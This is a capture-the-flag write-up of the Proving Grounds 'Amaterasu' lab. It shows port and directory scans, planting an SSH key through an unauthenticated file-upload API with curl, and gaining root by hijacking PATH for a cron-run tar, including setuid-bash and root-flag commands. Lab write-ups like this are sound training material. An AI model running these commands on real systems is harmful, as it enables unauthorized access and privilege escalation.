In this walk through, we will be going through the Amaterasu room from Proving Grounds. This room is rated as Easy on the platform and it consists of exploitation via Python File Server API to get the initial access. For privilege escalation, Path Hijacking is required to get root. So, let’s get started without any delay.
Table of Contents
Machine Info:
Title | Amaterasu |
IPaddress | 192.168.196.249 |
Difficulty | Easy |
OS | Linux |
Description | Amaterasu is an easy machine that is designed to test the enumeration skills of the user. Initial Access is taken via Python File Server API followed by a Path Hijacking privilege escalation attack to get root. |
Enumeration:
- I started off with my regular aggressive nmap scan and found only port open – 21 (FTP). That was strange for a bit.
$ sudo nmap -A 192.168.196.249 [sudo] password for wh1terose: Starting Nmap 7.80 ( https://nmap.org ) at 2024-01-12 23:14 IST Nmap scan report for 192.168.196.249 Host is up (0.18s latency). Not shown: 992 filtered ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 | ftp-anon: Anonymous FTP login allowed (FTP code 230) |_Can't get directory listing: TIMEOUT | ftp-syst: | STAT: | FTP server status: | Connected to 192.168.45.221 | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text | Data connections will be plain text | At session startup, client count was 3 | vsFTPd 3.0.3 - secure, fast, stable |_End of status | vulners: | cpe:/a:vsftpd:vsftpd:3.0.3: | PRION:CVE-2021-3618 5.8 https://vulners.com/prion/PRION:CVE-2021-3618 |_ PRION:CVE-2021-30047 5.0 https://vulners.com/prion/PRION:CVE-2021-30047 22/tcp closed ssh 111/tcp closed rpcbind 139/tcp closed netbios-ssn 443/tcp closed https 445/tcp closed microsoft-ds 2049/tcp closed nfs 10000/tcp closed snet-sensor-mgmt Aggressive OS guesses: Linux 2.6.32 (88%), Linux 2.6.32 or 3.10 (88%), Linux 2.6.39 (88%), Linux 3.10 - 3.12 (88%), Linux 3.4 (88%), Synology DiskStation Manager 5.1 (87%), Linux 4.9 (87%), Linux 3.5 (87%), Linux 4.2 (87%), Linux 4.4 (87%) No exact OS matches for host (test conditions non-ideal). Network Distance: 4 hops Service Info: OS: Unix TRACEROUTE (using port 443/tcp) HOP RTT ADDRESS 1 174.74 ms 192.168.45.1 2 174.70 ms 192.168.45.254 3 174.78 ms 192.168.251.1 4 176.10 ms 192.168.196.249 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 81.61 seconds
- Next, i performed a full TCP port scan and found three additional unknown ports running on high port numbers – 25022, 33414, 40080.
sudo nmap -sS -T5 -p- 192.168.196.249
Enumerating Port 21 (FTP)
- I started my enumeration with FTP and logged in using “anonymous” credentials into the server however i was unable to list the directories inside it as it was timing out.
ftp 192.168.196.249
Enumerating Port 33414 & 40080
- Next, i enumerated port 33414 it was running a web server however found nothing on the index page. We will come back to it later. Let’s move on for now.
- The port number 40080 reveals a static web page related to Mozilla. Found nothing interesting in the page source code and in the site’s contents.
- Next, fired gobuster on the server running on port 40080 and 33414 to reveals some hidden juicy directories. Found nothing interesting 40080 however the scan for 33414 reveals two interesting endpoints – /help and /info.
gobuster dir -u http://192.168.196.249:40080/ -w ~/Desktop/Wordlist/SecLists/Discovery/Web-Content/raft-small-directories-lowercase.txt -t 20
$ gobuster dir -u http://192.168.196.249:33414/ -w ~/Desktop/Wordlist/SecLists/Discovery/Web-Content/raft-small-directories-lowercase.txt =============================================================== Gobuster v3.1.0 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://192.168.196.249:33414/ [+] Method: GET [+] Threads: 10 [+] Wordlist: /home/wh1terose/Desktop/Wordlist/SecLists/Discovery/Web-Content/raft-small-directories-lowercase.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.1.0 [+] Timeout: 10s =============================================================== 2024/01/12 23:35:24 Starting gobuster in directory enumeration mode =============================================================== /help (Status: 200) [Size: 137] /info (Status: 200) [Size: 98] =============================================================== 2024/01/12 23:48:00 Finished ===============================================================
- Looking at the found directories on port 33414 reveals a “Python File Server REST API” on the server. With the help of this, we can list any directory on the server and upload files to it. Bingo!
- In the background, i have also had initiated a full aggressive scan on the newly found ports and the results shows that port 25022 is running SSH on it. While 33414 and 40080 we have already explored.
sudo nmap -A -p 25022,33414,40080 192.168.196.249
- Moving on with our enumeration using the API endpoint, we can look into the home directory of user “alfredo” and also its ssh directory. That means, if we can upload our public key in the folder using the API functionality, then we can log in as user alfredo into the server via SSH.
Initial Access:
- To test our hypothesis, let’s first upload a text file on to the server using the below command.
curl -i -L -X POST -H "Content-Type: multipart/form-data" -F file="@/home/wh1terose/CTF/PG-Play/machines/Amaterasu/test.txt" -F filename="/home/alfredo/test.txt" http://192.168.196.249:33414/file-upload
- The above command gives us a positive result as we were able to successfully upload a file onto the server using the File Server API.
- Now, let’s generated a SSH key pair using ssh-keygen. Save it in your current working directory.
ssh-keygen
- Now we will upload our RSA public key in the .SSH folder of user alfredo. I was getting a little hiccup here while uploading as the API only accepts certain extensions. So, i changed the extension of my target file to id_rsa.pub.txt and the uploaded file name will be authorized_keys. Using the below command gives me a successful hit.
curl -i -L -X POST -H "Content-Type: multipart/form-data" -F file="@/home/wh1terose/CTF/PG-Play/machines/Amaterasu/id_rsa.pub.txt" -F filename="/home/alfredo/.ssh/authorized_keys" http://192.168.165.249:33414/file-upload
- With the help of our earlier generated RSA private key logged into the server via SSH. Thus, getting the initial foothold and captured the local flag.
chmod 600 id_rsa ssh -i id_rsa [email protected] -p 25022
Privilege Escalation:
- Performed some post-compromise enumeration on the target and found one interesting cron job entry. A script name “backup-flask.sh” is running as root for about 30 seconds. I looked inside the file and found out that it is first setting up the PATH variable to the user alfredo home directory inside the restapi folder and then using tar to create a backup of the file inside the directory. That means, we can perform a Path hijacking attack on the “tar” binary as it is not using an absolute path. Once the cron job will execute the script, our malicious tar binary will also be executed in place of the original one. Thus, giving us root on the system.
cat /etc/crontab ls -l /usr/local/bin/backup-flask.sh cat /usr/local/bin/backup-flask.sh
- I tried to make a copy of the bash binary and was able to get it to work by executing as root but i didn’t got root for some reason. Earlier, i have also tried to get a reverse shell but the machine was not pinging to my local box for some reason. Ideally, it should have worked but it didn’t.
echo -ne '#!/bin/bash\ncp /bin/bash /tmp/bash\nchmod 4755 /tmp/bash' > tar chmod 777 tar export PATH=/home/alfredo/restapi:$PATH echo $PATH
- So, i used the same technique to just get the root flag and completed the challenge.
echo -ne '#!/bin/bash\n cat /root/proof.txt > /tmp/flag.txt' > tar chmod 777 tar export PATH=/home/alfredo/restapi:$PATH echo $PATH
Also Read: PG – Access
Conclusion:
So that was “Amaterasu” for you. We started off with a regular nmap scan and found a few ports open. Started the enumeration on web server running on port 33414 and found a Python File Server REST API v2.5 installation. Abused it to upload my SSH Keys on target alfredo’s SSH directory, thus giving us initial access. Then, found a backup-flash.sh script in the cron jobs that was creating a backup of the restapi directory using tar. Abused the tar binary with Path Hijacking technique to get root. On that note, i would take your leave and will meet you in next one. Till then, “Happy hacking”.